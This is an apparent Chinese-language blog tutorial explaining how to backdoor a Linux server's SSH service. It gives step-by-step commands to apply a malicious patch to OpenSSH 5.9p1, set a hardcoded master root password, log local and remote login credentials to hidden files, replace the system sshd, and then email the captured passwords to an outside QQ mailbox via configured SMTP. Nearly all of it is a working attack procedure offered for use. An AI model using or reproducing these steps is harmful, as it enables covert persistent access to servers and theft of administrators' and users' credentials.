黑客是如何安装后门并窃取服务器密码的

2016-05-25 11:47·孔夫子读书会

上传后门程序:

0x06-openssh-5.9p1.patch.tar.gz #后门补丁程序

openssh-5.9p1.tar.gz #包括了sshd服务端和 客户端。

安装:

解压文件

[root@xinsz08 tmp]# tar zxvf openssh-5.9p1.tar.gz

[root@xinsz08 tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

安装openssh-5.9p1并打补丁:补丁, 用一些文件替换原来的文件。

[root@xinsz08 tmp]# cd openssh-5.9p1.patch/

[root@xinsz08 openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1

[root@xinsz08 openssh-5.9p1.patch]# cd ../openssh-5.9p1

[root@xinsz08 openssh-5.9p1]#patch < sshbd5.9p1.diff #打补丁

注: 使用0x06-openssh-5.9p1.patch.tar.gz #后门补丁包中的sshbd5.9p1.diff文件修改了 sshd和ssh客户相关的文件。

修改劫持root密码文件夹的目录和默认的root后门密码

注: Linux中一个帐号只有一个密码。 比如root帐号,只有一个密码:123456

一个帐号root有两个密码。 一个密码是正常使用的:123456,另一个密码是后门密码: mkinge

[root@xinsz08 openssh-5.9p1]# vim /tmp/openssh-5.9p1/includes.h

找到:

改:

#define ILOG "/tmp/ilog" //这是记录本机帐号密码

#define OLOG "/tmp/olog" //这是记录远程帐号密码

#define SECRETPW "apaajaboleh" //你后门密码

#endif /* INCLUDES_H */

为:

177 #define ILOG "/usr/share/ifile"

178 #define OLOG "/usr/share/ofile"

179 #define SECRETPW "mkinge"

安装:安装打了补丁sshd服务,替换原来的sshd服务。

[root@xinsz08 openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注: 检查系统环境,将软件包安装到/usr目录下。

--with-pam #支持pam认证

--with-kerberos5 #支持kerberos认证

[root@xinsz08 openssh-5.9p1]# make -j 4 # make编译: 把源代码编译成可执行的二进制文件。 -j 4以4个进程同时编译。 速度快。

[root@xinsz08 openssh-5.9p1]# make install #安装

测试:

当用户再次远程登录后,


[root@xinsz08 ~]# ls /usr/share/ifile

/usr/share/ifile

[root@xinsz08 ~]# cat /usr/share/ifile

user:password -->root:123456

到这里我们密码劫持成功了

测试2:root的后门密码

注: Linux中一个帐号只有一个密码。 比如root帐号,只有一个密码:123456

安装后门程序后:

一个帐号root有两个密码。 一个密码是正常使用的:123456,另一个密码是后门密码: mkinge

[root@xinsz08 ~]# echo 234567 | passwd --stdin root

[root@xinsz08 openssh-5.9p1]# ssh root@192.168.1.63

root@192.168.1.63's password:mkinge

Last login: Sat Aug 29 10:29:33 2015 from 192.168.1.224

[root@xinsz08 ~]# cat /usr/share/ofile

user:password@host --> root:mkinge@192.168.1.63

注:Linux系统中一个用户名对应一个密码。 一个root帐号对应两个密码。

注:但是所有密码还是在别人的服务器上,怎么把密码整到自己邮箱?

自动发送邮件:这里以QQ的smtp服务器为例

LINUX下通过外部QQ的SMTP发邮件

[root@xinsz08 ~]# vim /etc/mail.rc

set from=1273815479@qq.com smtp=smtp.qq.com

set smtp-auth-user=1273815479 smtp-auth-password= smtp-auth=login

注:

set from=815479@qq.com #指定发件人的邮箱,这里我们就写成和收件人的邮箱一样。

set smtp-auth-user=815479 #写自己发件人的邮箱帐号

smtp-auth-password=123456 #写自己发件人的邮箱密码

测试:

[root@xinsz08 ~]# mail -s "demo title" 1273815479@qq.com < /usr/share/ifile

好了,现在你可以看一下,是否收到了邮件,同时在改几次密码,你会发现无论怎么改密码都会发到你的邮箱里了。

举报
评论 0
    热门: